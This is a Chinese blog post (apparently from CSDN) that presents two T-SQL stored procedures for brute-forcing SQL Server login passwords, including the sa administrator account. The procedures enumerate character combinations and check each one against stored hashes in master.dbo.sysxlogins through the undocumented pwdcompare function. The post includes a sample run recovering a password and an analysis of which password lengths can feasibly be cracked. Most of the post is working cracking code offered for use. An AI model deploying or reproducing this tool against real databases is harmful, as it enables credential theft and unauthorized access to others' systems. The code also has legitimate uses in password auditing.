破解MSSQL的SA密码

最新推荐文章于 2023-07-08 17:37:45 发布
最新推荐文章于 2023-07-08 17:37:45 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: SQL 文章标签: 破解 sql server 存储 null 测试 c
 

破解MSSQL的SA密码

代码演示暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码。

今天看到网上有这样一篇文章“一个SQL Server Sa密码破解的存储过程”:http://www.wangchao.net.cn/bbsdetail_1804540.html,方法就是暴力破解MSSQL的帐号和密码,包括管理员帐号sa的密码,发现写的很好,不知原贴何处,网上有多处转载,下面我对其它的代码稍做修改,并进行了一些性能分析。

首先说说破解过程序核心思想,就是存储帐号密码的master.dbo.sysxlogins表和未公布的密码比较存储过程pwdcompare。经过一方分析,修改了部分代码,下面贴出修改前后的代码,

一个SQL Server Sa密码破解的存储过程

一个SQL Server Sa密码破解的存储过程
alter proc p_GetPassword 
    @username sysname=null, --用户名,如果不指定,则列出所有用户 
    @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 
as 
    set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end 
    select top 255 id=identity(int,0,1) into #t from syscolumns 
    alter table #t add constraint PK_#t primary key(id) 
    select name,password 
        ,type=case when xstatus&2048=2048 then 1 else 0 end 
        ,jm=case when password is null then 1 else 0 end 
        ,pwdstr=cast('' as sysname) 
        ,pwd=cast('' as varchar(8000)) 
        into #pwd 
    from master.dbo.sysxlogins a 
    where srvid is null 
        and name=isnull(@username,name) 
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000) 
    declare @l int 
    select @l=0 
        ,@s1='char(aa.id)' 
        ,@s2='cast(aa.id as varchar)' 
        ,@s3=',#t aa' 
    exec(' 
        update pwd set jm=1,pwdstr='+@s1+' 
        ,pwd='+@s2+' 
        from #pwd pwd'+@s3+' 
        where pwd.jm=0 
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1 
        ') 
    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen) 
    begin 
        select @l=@l+1
        ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)' 
        ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)' 
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97) 
        exec(' 
        update pwd set jm=1,pwdstr='+@s1+' 
        ,pwd='+@s2+' 
        from #pwd pwd'+@s3+' 
        where pwd.jm=0 
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1 
        ') 
    end 
    select 用户名=name,密码=pwdstr,密码ASCII=pwd
    from #pwd 
GO

 下面是我修改后的代码:

修改后的SQL Server Sa密码破解的存储过程
alter proc p_GetPassword2 
    @username sysname=null, --用户名,如果不指定,则列出所有用户 
    @pwdlen int=2 --要破解的密码的位数,默认是2位及以下的 
as 
    set nocount on

    if object_id(N'tempdb..#t') is not null
        drop table #t
    if object_id(N'tempdb..#pwd') is not null
        drop table #pwd

    set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

    declare @ss varchar(256)
    --select @ss= '123456789'
    select @ss=    'abcdefghijklmnopqrstuvwxyz'
    select @ss=@ss+ '`0123456789-=[]\;,./'
    select @ss=@ss+ '~!@#$%^&*()_+{}|:<>?'
    --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

    create table #t(c char(1) not null)
    alter table #t add constraint PK_#t primary key CLUSTERED (c) 
    declare @index int
    select @index=1
    while (@index <=len(@ss))
    begin
        insert #t select SUBSTRING(@ss, @index, 1)
        select @index = @index +1
    end

    select name,password 
        ,type=case when xstatus&2048=2048 then 1 else 0 end 
        ,jm=case when password is null then 1 else 0 end 
        ,pwdstr=cast('' as sysname) 
        ,pwd=cast('' as varchar(8000)) 
        ,times =cast('' as varchar(8000))
        into #pwd 
    from master.dbo.sysxlogins a 
    where srvid is null 
        and name=isnull(@username,name) 
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

    declare @l int, @t bigint

    select @t = count(1)*POWER(len(@ss),1) from #pwd

    select @l=0 
        ,@s1='aa.c' 
        ,@s2='cast(ASCII(aa.c) as varchar)' 
        ,@s3=',#t aa'
        ,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'

    exec(' 
        update pwd set jm=1,pwdstr='+@s1+' 
        ,pwd='+@s2+' 
        from #pwd pwd'+@s3+' 
        where pwd.jm=0 
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1 
        ') 
    while exists(select 1 from #pwd where jm=0 and @l<@pwdlen) 
    begin 
        select @l=@l+1
        select @t = count(1)*POWER(len(@ss),@l+1) from #pwd
        print @t

        select
        @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c' 
        ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)' 
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
        ,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'

        exec(' 
        update pwd set jm=1,pwdstr='+@s1+' 
        ,pwd='+@s2+' 
        ,times='''+@stimes+'''
        from #pwd pwd'+@s3+' 
        where pwd.jm=0 
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1 
        ') 
    end 
    select 用户名=name,密码=pwdstr,密码ASCII=pwd, 查询次数和行数=times 
    from #pwd 

    if object_id(N'tempdb..#t') is not null
        drop table #t
    if object_id(N'tempdb..#pwd') is not null
        drop table #pwd

 

我测试如下

p_GetPassword2 'b', 6

用户名密码密码ASCII查询次数和行数
b12349,50,511th,66rows;2th,4356rows;3th,287496rows

 

性能分析:

本例以一个查询能查询bigint的最大值条记录9223372036854775807为限做为主机最大性能,来粗略计算破解性能。

破解一个帐号的密码长度,破解时间和性能消耗,是以所有用于破解的字符长度为底,以密码长度为指数的指数函数,即:破解帐号个数 * (所有用于破解的字符个数)最长密码长度次方 < 主机最大性能:

  • 原存储过程使用256个破解字符,理论上可以破解7位密码,即2567<Max(bigint)。
  • 我修改的存储过程使用66个键盘常规字符,理论上可以破解10位密码,即6610<Max(bigint)。
  • 如果知道密码是10个数字字符的组合,理论上可以破解19位密码,即1019<Max(bigint)。
tzjly
关注
专栏目录
关于sql server sa密码破解的一个方法
08-25 4530
小弟最近发现了sql server加密密码的函数pwdencrypt(),在sp_addlogin存储过程中,又发现了口令比较的函数pwdcompare(),在sp_password存储过程中,虽然是单向加密的,但是能通过穷举来猜到sa密码,当然其他的登录帐户的密码也是可以猜到的原帖:http://community.csdn.net/Expert/topic/3249/3249297.xml?
mysql数据库sa默认密码_sql server 数据库忘记sa账户密码/ 无管理员账户解决办法...
weixin_28934777的博客
01-28 4352
一、计算机超级管理员账户有数据库的管理员权限用管理员账户登录数据库,直接修改sa账户密码即可。二、数据库中没有管理员权限的账户SQL Server 2005/2008提供了针对该情况的更好的灾难恢复方法,无需侵入master数据库,不会对master数据库中的对象和数据(例如登陆帐号,证书等)造成损坏。Windows管理员组的成员现在当SQL Server以单用户模式启动(另外一个名称为维护模式)...
SQL Server密码破解工具简介
01-08 2631
在对SQL Server系统执行入侵测试或者更高级别的安全审计时,有一种测试不应该被忽略,那就是SQL Server密码测试。这一点看起来显而易见,但是很多人都会忽略它。   密码测试可以帮助检查恶意入侵者或者外部攻击者,测试他们要强行进入数据库有多容易,而且还可以确保SQL Server用户对他们的账号负责。此外,测试密码的漏洞在SQL Server混合模式认证的情况下尤其重要,这种模式比其他
一个SQL密码破解存储过程
观自在书院
08-26 1514
原帖:http://community.csdn.net/Expert/topic/3271/3271317.xml?temp=.9382135if exists (select * from dbo.sysobjects where id = object_id(N[dbo].[p_GetPassword]) and OBJECTPROPERTY(id, NIsProcedure)
sql数据库管理员账号SA密码清除破解工具
03-28
每次遇到一些忘记密码的用户,真的很头痛,要去一步步的做,才可以清除密码,为了方便,本人做了个小工具, 呵呵 测试SQL2000、MSDE2000 测试SQL2005 全部通过,一点即除,百分百成功,只需3秒
SqlServer数据库管理员账号SA密码清除工具
08-06
每次遇到一些忘记SQLsa密码的客户,没办法连接服务器,真的很头痛,要去一步步的做,才可以清除密码, 为了方便,本人做了这个一键清除的小工具, 呵呵,如果好用,别忘记了给我评一句哦,谢谢 测试SQL2000、MSDE2000、SQL2005 全部通过,一点即除,百分百成功
sa密码不满足强密码要求_恢复丢失的SA密码
culuo4781的博客
07-26 3995
sa密码不满足强密码要求 In this article, we will review how to recover SA password by starting SQL Server in single user mode when you forget “sa” credentials or lose the access to the instances due to the fo...
忘记mysql 数据库密码修改学习记录
m0_49035720的博客
03-06 494
1.找到mysql.exe和mysqld.exe程序的所在文件夹路径如:(C:\Users\FU\Desktop\mysql\bin) 2.
MySQL密码长不为6_mysql密码问题
weixin_31061573的博客
01-18 1066
这位老哥的:版权声明:本文为CSDN博主「csdn-华仔」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.csdn.net/hello_world_qwp/article/details/79551789密码策略问题异常信息:ERROR 1819 (HY000): Your password does not satisfy...
sql server sa密码查看器
01-05
sa密码,只适用于sql server 2000
mac mysql密码错误_解决mac 下mysql安装后root用户登录密码错误问题
weixin_33765959的博客
01-18 761
使用的mac OS 10.11 安装mysql后访问root/root用户失败,网上找了一些解决办法,下面记录下解决方法方便以后自己查询概述(看懂下面就不用看了):停服务:sudo /usr/local/mysql/support-files/mysql.server stop安全模式启动(登录不需要密码了):sudo /usr/local/mysql/bin/mysqld_safe --ski...
忘记SQL SERVERSA 密码解决方法
tianlianchao1982的专栏
05-10 838
情况一:只是忘记了密码 方法一: sp_password Null,'123,'sa' 把sa密码设为“123” 执行成功后有“Command(s) completed successfully.” OK! 方法二(推荐): 第一步:打开 SQL2008 用管理员登录先,然后在服务名处右击选属性>安全性>右边的登录方式选项改为身份验证 确定! 第二步:选择安
SybaseASE数据库sa密码破解
老扁的专栏
04-08 5973
数据库服务器:SybaseASE 11.9.2假设计算机名(或者Sybase的服务名)为Test1、停止Sybase服务在Sybase Central或Windows服务管理中停止Sybase的所有服务。2、修改服务启动文件:在Sybase主目录(一般为c:/sybase)的install子目录中,有一个用来启动Sybase服务的批处理文件,文件名为RUN_Test.dat。点击鼠标右
找回SQL Server数据库SA密码
10-21 1397
我想大家在日常工作当中
一个SQL Server Sa密码破解存储过程
魔拉宝
11-28 1530
  if exists (select * from dbo.sysobjects where id = object_id(N[dbo].[p_GetPassword]) and OBJECTPROPERTY(id, NIsProcedure) = 1)   drop procedure [dbo].[p_GetPassword]   GO      /*--穷举法破解
MSSQL(SQL SERVER) 修改sa用户密码遇到的坑
程序猿的编程之路
01-23 1万+
sql server有时候要修改sa密码,开始以为很简单,只要如下操作: 1、MSSM用Windows身份验证登陆(相当于管理员登陆了) 2、登陆后右击“安全性-登录名-sa-属性” 3、修改密码,然后修改服务器角色(一般默认sysadmin和public),修改状态 4、然后确定,断开连接,使用sa登陆,然后失败了,网上有这么几种说法:   1&gt;强制实施密码策略后,...
SQL Server数据库忘记了sa密码怎么办 亲测真的可用
最新发布
chenggong9527的博客
07-08 3990
我们在安装SQL Server数据库时,往往选择混合模式安装,在这里我们可以设置sa密码。混合模式安装后,我们可以通过Windows身份验证和SQL Server身份验证两种方式登陆。一、 用windows身份验证登陆Microsoft SQL Server Management Studio。如果sa密码忘记了,我们就无法用SQL Server身份验证登陆了。二、在左侧菜单栏中,【安全性】-【登陆名】-sa。四、重新输入“密码”及“确认密码”,点击【确定】。三、 sa-右键-属性。
SQL Server 修改sa密码(亲测有效)
热门推荐
newdriverest的博客
09-30 2万+
亲测有效SQL Server修改sa密码方法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值